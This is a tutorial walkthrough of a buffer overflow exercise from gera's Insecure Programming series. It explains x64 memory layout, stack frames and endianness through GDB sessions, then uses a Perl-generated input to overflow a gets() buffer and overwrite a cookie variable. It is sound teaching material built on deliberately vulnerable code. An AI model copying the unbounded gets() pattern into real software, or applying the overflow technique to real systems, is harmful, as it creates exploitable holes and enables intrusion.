Stack Warmup 1

by gr0k

29 August 2018

stack1.c is the first of the Stack Warmup Exercises. This guide will walk you through the buffer overflow process and explain the details behind what’s happening. I ran all of the following on a 64-bit Ubuntu 18.04 box.

Source Code Review

We’ll start with a review of the source code to get an idea of what’s happening and what we need to do. If you’re coming here directly, check out my Getting Started walkthrough to get up and running.

// stack1-stdin.c                               
// specially crafted to feed your brain by gera

#include <stdio.h>

int main() {
  int cookie;
  char buf[80];

  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);

  if (cookie == 0x41424344)
    printf("you win!\n");
}

First, two variables are declared: cookie and buf. cookie is defined as an int variable, and buf is an array of 80 characters.

Line 10 has a print statement with two format parameters. A format parameter is written as a percent sign followed by a letter that specifies how the program should display the corresponding argument. In this case, the x means print the value as hexadecimal. The characters between the % and the x control the width of the output: 08 pads the value with leading zeros to at least eight digits. The values to print are listed after the format string. In the C programming language, & is the ‘address-of’ operator, which yields the memory address of the variable that follows it. This line therefore prints the memory addresses of the buf and cookie variables. On this 64-bit system the addresses are wider than the 32-bit value %x expects, so in practice only their low 32 bits are displayed. Wikipedia has more information about C printf format strings here.

Line 11 calls the gets function. From the Open Group Library, the gets function operates as follows:

The gets() function shall read bytes from the standard input stream, stdin, into the array pointed to by s, until a <newline> is read or an end-of-file condition is encountered. Any <newline> shall be discarded and a null byte shall be placed immediately after the last byte read into the array.

char *gets(char *str)

The char *gets means the gets function returns a pointer to a character. Upon successful execution, gets will return a pointer to str. The (char *str) means that the function takes one parameter, a pointer to a string. This is where the function will write the input from stdin. For more on reading C functions, the guides here and here are useful. The cdecl command line tool or web app are also useful for decoding complicated C declarations.

One thing to notice in the description and function syntax above is that the only parameter for gets is a destination for the input. gets will continue reading data until it receives a newline character or end-of-file condition. There are no parameters that specify how much data should be written to the buffer, so gets will copy it all into the specified destination, regardless of whether the destination is big enough. This is what makes gets so dangerous to use, and what we’re going to exploit for the buffer overflow.

Line 14 will print “you win!” if the value of cookie is 0x41424344. You’ll notice there is no point in this code where you can set the value of cookie. We need to either figure out how to set the cookie variable in order to successfully execute the if statement, or find some other way to print “you win!”

Running the Program

If you followed the Setup Guide, you can run the stack1 binary from the InsecureProgramming/bin directory with ./stack1.

gr0ked (master) bin $ ./stack1
buf: a091ad20 cookie: a091ad7c
AAAAA
gr0ked (master) bin $

As discussed above, the memory addresses for the buf and cookie variables are printed, the program takes input from the user, and then exits.

Examining the Program’s Internals

Having run the program, we can see the memory addresses for the buf and cookie variables displayed in hexadecimal. Knowing the buffer was declared as 80 bytes long, we might expect the two addresses to differ by exactly 80 bytes. In other words, we might guess that the cookie variable is stored immediately after the buffer. We can check this easily with some math in GDB. (If you’re new to GDB, you can check out my quick walkthrough here).

Looking at the addresses, you’ll note that the cookie address, 0xa091ad7c, is greater than the buffer’s address, 0xa091ad20. (If you’re unfamiliar with hex, you can confirm this by converting the values to decimal with this calculator). By subtracting the buffer’s address from the cookie variable’s address, we can see how much space is between the two variables. The addresses used below come from a run inside GDB, which disables address randomization by default, so they differ from the run above, but the distance is the same:

(gdb) p 0xffffddac - 0xffffdd50
$1 = 92

That’s weird. We declared the buffer to be 80 bytes long, but it looks like there are 92 bytes separating the two variables. Let’s explore why.

If we disassemble the main function, we can see what the assembly instructions are directing the CPU to do:

(gdb) disass /s main
Dump of assembler code for function main:
./exercises/stack1.c:
6	int main() {
   0x00000000004005b6 <+0>:	push   rbp
   0x00000000004005b7 <+1>:	mov    rbp,rsp
   0x00000000004005ba <+4>:	sub    rsp,0x60

7	    int cookie;
8	    char buf[80];
9
10	    printf("buf: %p cookie: %08x\n", &buf, &cookie);
   0x00000000004005be <+8>:	lea    rdx,[rbp-0x4]
   0x00000000004005c2 <+12>:	lea    rax,[rbp-0x60]
   0x00000000004005c6 <+16>:	mov    rsi,rax
   0x00000000004005c9 <+19>:	mov    edi,0x400694
   0x00000000004005ce <+24>:	mov    eax,0x0
   0x00000000004005d3 <+29>:	call   0x400480 <printf@plt>

These first three assembly instructions, push, mov, and sub, are called the function prologue. The function prologue does the work of the initial setup of memory for a function in a program. To better understand what’s happening, I’m going to take a detour to explain some parts of the CPU and how memory works.

CPU Architecture

The CPU uses special memory located directly on it called registers to store memory addresses, hold data for operations, and track the results of these operations. The size of a computer’s register is determined by the system’s “word size.” The word size of a computer is the maximum number of bits its CPU can process at once. On an x86 computer system, the word size is 32 bits, while on x64 systems the word size is 64 bits.

There are important differences between register names on 64- and 32-bit systems. The 64-bit general purpose registers, along with rip, start with the letter “r,” while their 32-bit counterparts start with the letter “e.” (The flags register is a special case: GDB still lists it as eflags on a 64-bit system.) The naming convention is a result of the way CPUs were developed over time. For a more in depth look, you can read this Stack Exchange answer about register naming conventions.

The registers for x64 based systems are as follows:

Registers	Name (Common Purpose)
rax	Accumulator (math operations)
rbx	Base (pointer to data)
rcx	Counter (track loop iterations)
rdx	Data (math operations)
rsi	Source Index (pointer to source memory address for stream operations)
rdi	Destination Index (pointer to destination memory address for stream operations)
rbp	Base Pointer (points to base of stack frame)
rsp	Stack Pointer (points to top of stack)
r8 - r15	General Purpose registers
rip	Instruction Pointer
eflags	Status Flags
cs, ss, ds, es, fs, gs	Segment Registers

Viewing Registers in GDB:

(gdb) i r
rax            0x7fffffffdd50	140737488346448
rbx            0x0	0
rcx            0x7ffff7dd18e0	140737351850208
rdx            0x7ffff7dd3790	140737351858064
rsi            0x602423	6300707
rdi            0x7fffffffdd53	140737488346451
rbp            0x7fffffffddb0	0x7fffffffddb0
rsp            0x7fffffffdd50	0x7fffffffdd50
r8             0x602424	6300708
r9             0x0	0
r10            0x57	87
r11            0x246	582
r12            0x4004c0	4195520
r13            0x7fffffffde90	140737488346768
r14            0x0	0
r15            0x0	0
rip            0x4005e9	0x4005e9 <main+51>
eflags         0x246	[ PF ZF IF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0

While x64 system registers all begin with “r,” you can access the lower order bits of these registers by using the “old” register names as shown below. To address bits 0-31, you can use eax, edx, etc. For bits 0-15, you can use ax, dx, etc. This was implemented to ensure backwards compatibility with programs written for older architectures.

The 16-bit registers ax, bx, cx, and dx can be split further into 8-bit halves: the low order bits (0-7) are accessed with an “l” suffix (al, bl, etc.) and the high order bits (8-15) with an “h” suffix (ah, bh, etc.). This convention doesn’t extend to the wider registers: there is no name for the upper half of eax or rax.

Computer Memory

Absolutely everything about the operation of a computer comes down to memory management. While the CPU does all the number crunching, all of the instructions it follows and the data it manipulates are stored in Random Access Memory, or RAM (assuming no memory has been swapped to disk, but that’s beyond the scope of this walkthrough).

When an executable gets loaded from disk into RAM, the binary instructions tell the CPU how to set up memory for the program. Most programs have the following segments in memory, with the segments starting at low addresses and moving to higher ones:

Code Segment
Data Segment
BSS Segment
Heap
Stack

When describing how memory is laid out, diagrams will be depicted in one of two ways: with low addresses shown on top of the diagram, or low addresses shown on the bottom. I will use the former convention, because I think it makes it easier to visualize what happens during buffer overflows.

This is what a program in memory looks like:

Lower Memory Addresses
----------------------
|     code segment   |  <- Machine Instructions     
|--------------------|
|     data segment   |  <- Initialized global variables
|--------------------|
|      bss segment   |  <- Uninitialized global variables
|--------------------|
|        heap        |  <- Dynamically allocated memory
|--------------------|
|          |         |  Heap grows to higher addresses
|          v         |
|                    |
|          ^         |  Stack grows towards lower addresses
|          |         |
|--------------------|
|        stack       |  <- Function + Local variable storage
|--------------------|
Higher Memory Addresses

We can see the differences in addresses by looking at the program’s memory with gdb. We’ll use the following program, mem_segments.c, to explore this. Save this to a file and compile it with gcc -g -o mem_segments mem_segments.c. We’ll run the program in gdb and look at its memory segments.

#include <stdio.h>
#include <stdlib.h>

int number_init = 10;
int number_uninit;

int function1(int a, int b);

int main() {
    char *ptr1;
    char *ptr2;
    int mem_block = 50;

    int var_a = 10;
    int var_b = 20;
    int result;

    printf("Hello, world!\n");

    ptr1 = malloc(100);
    ptr2 = malloc(mem_block);

    free(ptr1);
    free(ptr2);

    result = function1(var_a, var_b);
    printf("Result: %d\n", result);

    return 0;
}

int function1(int a, int b) {
    int var1 = 10;
    int answer;

    char var2[2] = "A";
    char *var_ptr;
    var_ptr = var2;

    printf("Letter A as Hex character: 0x%x\n", *var_ptr);

    answer = a + b + var1;

    return answer;
}

When you compile and run the program, you should get the following output:

gr0ked Desktop $ gcc -g -o mem_segments mem_segments.c
gr0ked Desktop $ ./mem_segments
Hello, world!
Letter A as Hex character: 0x41
Result: 40

Take note of what the capital letter “A” looks like as a hexadecimal character. We’ll need that information later.

Code Segment

The code segment, or text section, contains the executable instructions of a program. As a program executes, the instruction pointer (rip on x64, eip on x86), will point to the memory address of the next instruction to execute. We can see below the machine instruction currently pointed to by rip is located at a low memory address of 0x40066e. We can also see the next instructions that the CPU will execute and their memory addresses.

gr0ked Desktop $ gdb -q mem_segments
Reading symbols from mem_segments...done.
(gdb) break main
Breakpoint 1 at 0x40066e: file mem_segments.c, line 12.
(gdb) run
Starting program: /home/gr0ked/Desktop/mem_segments

Breakpoint 1, main () at mem_segments.c:12
12	    int mem_block = 50;
(gdb) x/3i $rip
=> 0x40066e <main+8>:	mov    DWORD PTR [rbp-0x20],0x32
   0x400675 <main+15>:	mov    DWORD PTR [rbp-0x1c],0xa
   0x40067c <main+22>:	mov    DWORD PTR [rbp-0x18],0x14

Data and bss segments

The data (initialized variables) and bss (uninitialized variables) sections are where global data is stored. When a global variable is declared in a program and given a starting value, such as int number = 10, that variable would be stored in the initialized area. If the variable is not assigned a starting value, such as int number, it gets stored in the uninitialized section.

(gdb) x/xw &number_init
0x601058 <number_init>:	0x0000000a
(gdb) x/xw &number_uninit
0x601060 <number_uninit>:	0x00000000

The variables number_init and number_uninit are global because they are declared outside of any function. As a result, any function in this program can see and manipulate those values.

The two variables are located at 0x601058 and 0x601060. Because the size of these sections won’t change during execution, unlike the stack and the heap, they can be placed right next to each other, which is why only eight bytes separate these variables. This thread on Stack Overflow is useful for understanding the historical reasons for having these two different segments.

Heap

The heap is for dynamically allocated memory. This allows programmers to assign memory for variables when they don’t know initially how much they need with the memory allocation function malloc(). malloc() takes a number specifying how much memory is requested, and returns a pointer to the allocated block of memory. In mem_segments.c we requested two blocks of memory, one by specifying a set number of bytes, and one with an int variable.

(gdb) break 22
Breakpoint 2 at 0x4006ac: file mem_segments.c, line 22.
(gdb) c
Continuing.
Hello, world!

Breakpoint 2, main () at mem_segments.c:23
23	    free(ptr1);
(gdb) x/xw ptr1
0x602420:	0x00000000
(gdb) x/xw ptr2
0x602490:	0x00000000

When we examine the addresses stored in the pointers, you can see that the second pointer holds a higher memory address than the first, showing how the heap grows towards larger addresses. When we are done with the memory, we use free() to release it so it can be reused.

You may have noticed when we inspected the memory of the pointers that we didn’t prefix the variable with an & like we have before. Pointers are powerful variables but they have some idiosyncrasies that are not obvious at first glance. If we had used the address-of operator, we would have gotten back the memory address of the pointer variable itself, which is located on the stack. However, because we were interested in the memory address the pointer was actually pointing to, we leave off the & operator.

Stack

The last memory section to look at is the stack. The stack is what allows us to use functions to modularize our code. It is known as a “Last In, First Out” (LIFO) data structure. You can think of it like the spring loaded plate dispensers at a buffet restaurant: the last plate added to the stack will be the first plate taken off. Adding data to the stack is done with a push instruction, while taking data off the stack is done with a pop instruction.

The data for each of a program’s functions is stored in what’s called a “stack frame”. The CPU tracks the start and end of the stack frame with the rbp and rsp registers. rbp points to the bottom of the frame located at higher memory addresses, while rsp points to the top of a frame at a lower address. Stack frames only exist when their function is called. For our example code, mem_segments.c, if you set a breakpoint at main, there will be no stack frame for the function1() function until after it is called on line 26.

The stack starts at very high memory addresses and grows towards lower memory addresses. The image below shows what the stack frame for mem_segments.c looks like for the main function. Each block of memory shown below represents 4 bytes. Because this is a 64-bit architecture, the pointers require 8 bytes (64 bits) of storage, which is why they are shown across two rows.

Stack Layout

While data can only be added or removed from the top of the stack with push and pop, we can still manipulate the data stored on the stack by referencing variable locations relative to the base pointer. The image above shows how this is done, with variables being referenced as offsets from rbp. The code block below shows what this looks like in gdb. The last three instructions show the variables mem_block, var_a, and var_b being initialized with the values 50 (0x32), 10 (0xa), and 20 (0x14).

(gdb) disass main
Dump of assembler code for function main:
   0x0000000000400666 <+0>:	push   rbp
   0x0000000000400667 <+1>:	mov    rbp,rsp
   0x000000000040066a <+4>:	sub    rsp,0x20
   0x000000000040066e <+8>:	mov    DWORD PTR [rbp-0x20],0x32
   0x0000000000400675 <+15>:	mov    DWORD PTR [rbp-0x1c],0xa
   0x000000000040067c <+22>:	mov    DWORD PTR [rbp-0x18],0x14

Below is what the stack frame image from above actually looks like when viewed in gdb. Each row shows 16 bytes of memory. You can see var_a is stored at address 0x7fffffffddc4 and currently contains the value 0. It won’t contain the value 10 until the assembly instruction mov DWORD PTR [rbp-0x1c],0xa is executed. The variable is located 0x1c bytes below rbp, as shown below.

(gdb) i r rsp rbp
rsp            0x7fffffffddc0	0x7fffffffddc0
rbp            0x7fffffffdde0	0x7fffffffdde0

(gdb) x/16xw $rsp
0x7fffffffddc0:	0x00400770	0x00000000	0x00400570	0x00000000
0x7fffffffddd0:	0xffffdec0	0x00007fff	0x00000000	0x00000000
0x7fffffffdde0:	0x00400770	0x00000000	0xf7a2d830	0x00007fff
0x7fffffffddf0:	0x00000000	0x00000000	0xffffdec8	0x00007fff

(gdb) x/xw &var_a
0x7fffffffddc4:	0x00000000

(gdb) x/xw $rbp-0x1c
0x7fffffffddc4:	0x00000000

As you examine the memory addresses of a program in GDB, one thing to keep in mind is these addresses are all virtual memory addresses. The operating system abstracts the computer’s physical memory for each program, allowing each program to think it has all of the physical RAM available for its own use. Although two programs may show a variable stored at the same memory address when viewed in GDB, the operating system translates each program’s virtual memory address to the actual physical address in RAM. This translation process is beyond the scope of what’s needed for these walkthroughs, so I won’t go into it here.

Now that we understand memory layout and stack frames we can discuss the function prologue and stack frame construction.

Stack Frame Construction

(gdb) disass main
Dump of assembler code for function main:
	... OUTPUT TRIMMED ...
   0x00000000004006c4 <+94>:	mov    edx,DWORD PTR [rbp-0x18]
   0x00000000004006c7 <+97>:	mov    eax,DWORD PTR [rbp-0x1c]
   0x00000000004006ca <+100>:	mov    esi,edx
   0x00000000004006cc <+102>:	mov    edi,eax
   0x00000000004006ce <+104>:	call   0x4006f1 <function1>
   0x00000000004006d3 <+109>:	mov    DWORD PTR [rbp-0x14],eax
   0x00000000004006d6 <+112>:	mov    eax,DWORD PTR [rbp-0x14]
	... OUTPUT TRIMMED ...

function1() gets called on line 26 of mem_segments.c. This translates to the call assembly instruction seen above, call 0x4006f1 <function1>. When executed, call pushes the address of the next instruction, 0x00000000004006d3, onto the stack. This pushed address is referred to as the “return address.” The return address is the memory address of the instruction the CPU will execute once the called function ends. After the push, the instruction pointer jumps to the address specified in the call, 0x4006f1, and begins executing the instructions in the function.

function1() is called with two parameters, var_a and var_b. On older 32-bit architectures, function parameters would get pushed to the stack in reverse order, and they would be referenced as offsets from ebp. This still happens in certain situations, but with additional registers available on x64 CPUs, parameters can be passed to functions in registers. This is more efficient since the CPU doesn’t have to spend instructions or execution time storing extra data on the stack. Under the System V calling convention used on Linux, the first six integer or pointer parameters are passed to the callee function in the registers rdi, rsi, rdx, rcx, r8, and r9, in that order. You can see the setup for this occurring with the four mov instructions before the call instruction. For more information about this calling convention, you can read about the System V Application Binary Interface (ABI) from OS Dev here.

We can see the pushed return address after the call instruction in gdb below.

(gdb) break function1
Breakpoint 4 at 0x4006ff: file mem_segments.c, line 32.
(gdb) c
Continuing.
Hello, world!

Breakpoint 4, function1 (a=10, b=20) at mem_segments.c:32
32	int function1(int a, int b) {

(gdb) i r rbp
rbp            0x7fffffffddb0	0x7fffffffddb0

(gdb) x/4xw $rbp
0x7fffffffddb0:	0xffffdde0	0x00007fff	0x004006d3	0x00000000

Examining the memory pointed to by the base pointer, we can see the return address, 0x004006d3, on the stack. This return address is at [rbp+0x8], as shown in the stack frame diagram. We can also see the saved base pointer from the previous stack frame, 0x00007fffffffdde0. As seen above though, it appears that it’s split in half, and the two halves have been reversed. In order to understand what’s happening, we need to discuss the concept of “endianness.”

Endianness

When writing numbers, we can write them in two different ways. We’ve decided to write them from left to right, with digits further left representing greater powers of ten. In other words, when we see the number 123, we understand it to mean one hundred, two tens, and three ones. We could have just as easily decided to reverse that, and have the right most digits represent greater powers of ten. Reversed, we would read it as three hundreds, two tens, and one one.

This same convention applies to data stored in computer memory. Unlike our numbering system, which has agreed on one convention, computers can store bytes both ways. The way bytes are stored in memory is referred to as its “endianness,” a term that comes from Gulliver’s Travels, where some of the characters argued over whether an egg should be cracked open from the “big end” vs the “small end.”

Most computers today use little endian architecture, which is equivalent to reading numbers from right to left. Data is stored with the least significant byte in the lowest memory address. In comparison, when data is sent across a network link, it’s often sent with the most significant byte first. If the bytes are interpreted in the wrong order, the data will be misunderstood, as shown in the example with the number 123. There are other computer architectures that use big endian, but Intel and AMD x86 and x64 processors use little endian.

We can see the effect in memory here:

(gdb) x/8xb $rbp
0x7fffffffddb0:	0xe0	0xdd	0xff	0xff	0xff	0x7f	0x00	0x00

(gdb) x/xg $rbp
0x7fffffffddb0:	0x00007fffffffdde0

When we print the data at rbp as individual bytes, the byte representing the smallest powers of two is located at the lowest memory address. When we display it as a giant word (eight bytes) though, the bytes are displayed in reverse order, the way you would expect to read them. This is because gdb understands that the data is stored in memory in little-endian format, and displays the most significant byte first when the bytes are printed as a whole unit. If you print memory as words or giants, you just have to remember that even though gdb shows the value in this reader-friendly order, the first byte at memory address 0x7fffffffddb0 is really 0xe0, not 0x00.

We can see the same impact when we display the base pointer as words:

(gdb) x/2xw $rbp
0x7fffffffddb0:	0xffffdde0	0x00007fff

gdb is displaying the hex values in the proper order for each set of four bytes, with the most significant byte on the left to least significant on the right. Just remember that the bytes are still stored in reverse in memory.

When looking at eight byte variables in memory, it’s easier to print them as giants, whereas when looking at four byte variables, it’s easier to print them as words. I’ll print in the format that makes the most sense for the data being viewed.

Stack Frame Construction Continued

Now that we understand how to properly read the memory addresses in gdb, we can complete our understanding of stack frame construction.

The first step is when the function gets called. The return address is pushed to the stack and the instruction pointer jumps to the first instruction of the function. When something is pushed to the stack, the stack pointer is first decreased by 8 bytes (4 on an x86 system), and then the data is pushed to the new address rsp is now pointing to. You can see below how rsp is 8 bytes lower after function1() is called from main().

(gdb) run
Starting program: /home/gr0ked/Desktop/mem_segments

Breakpoint 1, main () at mem_segments.c:12
12	    int mem_block = 50;
(gdb) i r rsp rbp
rsp            0x7fffffffddc0	0x7fffffffddc0
rbp            0x7fffffffdde0	0x7fffffffdde0

(gdb) c
Continuing.
Hello, world!

Breakpoint 6, function1 (a=0, b=6299648) at mem_segments.c:32
32	int function1(int a, int b) {

(gdb) i r rsp rbp
rsp            0x7fffffffddb8	0x7fffffffddb8
rbp            0x7fffffffdde0	0x7fffffffdde0

The second step is the execution of the function prologue which sets up the required stack area for the stack frame. When the mem_segments.c source code is compiled, the compiler determines how much memory on the stack is needed for each function. The first instructions of the function then set up the frame.

(gdb) break *0x00000000004006f1
Breakpoint 6 at 0x4006f1: file mem_segments.c, line 32.

(gdb) run
Starting program: /home/gr0ked/Desktop/mem_segments

Breakpoint 1, main () at mem_segments.c:12
12	    int mem_block = 50;
(gdb) c
Continuing.
Hello, world!

Breakpoint 6, function1 (a=0, b=6299648) at mem_segments.c:32
32	int function1(int a, int b) {
(gdb) x/3i $rip
=> 0x4006f1 <function1>:	push   rbp
   0x4006f2 <function1+1>:	mov    rbp,rsp
   0x4006f5 <function1+4>:	sub    rsp,0x30

First, the main function’s base pointer is pushed to the stack. Then the base pointer is set to the stack pointer’s current address, which marks the base of the new frame. The stack pointer is then moved to a lower address by the amount of space necessary as determined by the compiler. In the example above, it’s 0x30 bytes. When the function prologue is done, we’ll have a new stack frame on the stack.

The image below shows the two stack frames:

Function Stack Frame

And the two stack frames in gdb:

(gdb) i r rsp rbp
rsp            0x7fffffffdd80	0x7fffffffdd80
rbp            0x7fffffffddb0	0x7fffffffddb0

(gdb) x/32xw $rsp
0x7fffffffdd80:	0x00602420	0x00000000	0x00602000	0x00000000
0x7fffffffdd90:	0x0000000d	0x00000000	0x00000000	0x00000000
0x7fffffffdda0:	0xffffdde0	0x00007fff	0x00400570	0x00000000
0x7fffffffddb0:	0xffffdde0	0x00007fff	0x004006d3	0x00000000
0x7fffffffddc0:	0x00000032	0x0000000a	0x00000014	0x00000000
0x7fffffffddd0:	0x00602420	0x00000000	0x00602490	0x00000000
0x7fffffffdde0:	0x00400770	0x00000000	0xf7a2d830	0x00007fff

Exploitation

Now that we understand a program’s memory layout, we can understand why the buf and cookie variables are 92 bytes apart instead of 80.

In order to make computers more efficient, data needs to be aligned along “boundaries” so the CPU can easily move chunks of data into its registers. If data isn’t aligned properly on the stack, there is extra overhead every time the CPU accesses it. With limited memory space no longer the issue it was in the early days of computing, compilers can afford to spend a few padding bytes to keep data aligned. You can read more about alignment at this Stack Overflow answer.

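When we look at the variables in stack1.c, we see we need 80 bytes for our buffer and 4 bytes for our cookie, for a total of 84 bytes. The closest 16 byte boundary that will accommodate 84 bytes is 96 (0x60), which matches the sub rsp,0x60 instruction in the function prologue. The disassembly shows buf at [rbp-0x60] and cookie at [rbp-0x4], so the two variables are 0x60 - 0x4 = 0x5c, or 92, bytes apart. This is the distance we saw earlier.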

Boundary Alignment

Now that we know how far apart the variables are and that gets() does not limit user input, we can craft our buffer overflow. We’ll need 92 bytes to reach the cookie variable, and then 4 additional bytes to overwrite it.

If you recall from the mem_segments.c program, the hexadecimal representation of the capital letter “A” is 0x41. When we did the source code review, we saw that the cookie variable needed to equal 0x41424344. Knowing that 0x41 is “A,” you can safely assume 0x42 is “B,” etc. If you ever need to check what the hex (and decimal) values are for any character, you can view the manual page for ASCII characters on the command line with man ascii.

Now that we know what our input needs to be, we can use Perl to generate our string:

gr0ked (master *) bin $ perl -e 'print "A"x92 . "ABCD"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCD

gr0ked (master *) bin $ gdb -q stack1
Reading symbols from stack1...done.
(gdb) break 12
Breakpoint 1 at 0x4005e9: file ./exercises/stack1.c, line 12.

(gdb) run
Starting program: /home/gr0ked/InsecureProgramming/bin/stack1
buf: ffffdd50 cookie: ffffddac
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCD
Breakpoint 1, main () at ./exercises/stack1.c:13
13	    if (cookie == 0x41424344)
(gdb) c
Continuing.
[Inferior 1 (process 18173) exited normally]

Nothing. We didn’t get “you win!”. Let’s look at why not.

(gdb) run
Starting program: /home/gr0ked/InsecureProgramming/bin/stack1
buf: ffffdd50 cookie: ffffddac
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCD

Breakpoint 1, main () at ./exercises/stack1.c:13
13	    if (cookie == 0x41424344)

(gdb) x/xw &cookie
0x7fffffffddac:	0x44434241

(gdb) x/24xw &buf
0x7fffffffdd50:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd60:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd70:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd80:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd90:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdda0:	0x41414141	0x41414141	0x41414141	0x44434241

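We can see at breakpoint 1 that cookie has to equal 0x41424344. When we look at memory, we see the buffer has overflowed into cookie, but the value is 0x44434241. This, as you may have guessed, is because of the endianness. Our input was written to memory in order, with “A” (0x41) at the lowest address, and a little-endian CPU treats the byte at the lowest address as the least significant. We need to reverse the letters in our buffer.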

gr0ked (master *) bin $ perl -e 'print "A"x92 . "DCBA"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gr0ked/InsecureProgramming/bin/stack1
buf: ffffdd50 cookie: ffffddac
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA

Breakpoint 1, main () at ./exercises/stack1.c:13
13	    if (cookie == 0x41424344)
(gdb) c
Continuing.
you win!
[Inferior 1 (process 18198) exited normally]

You win. Well done.
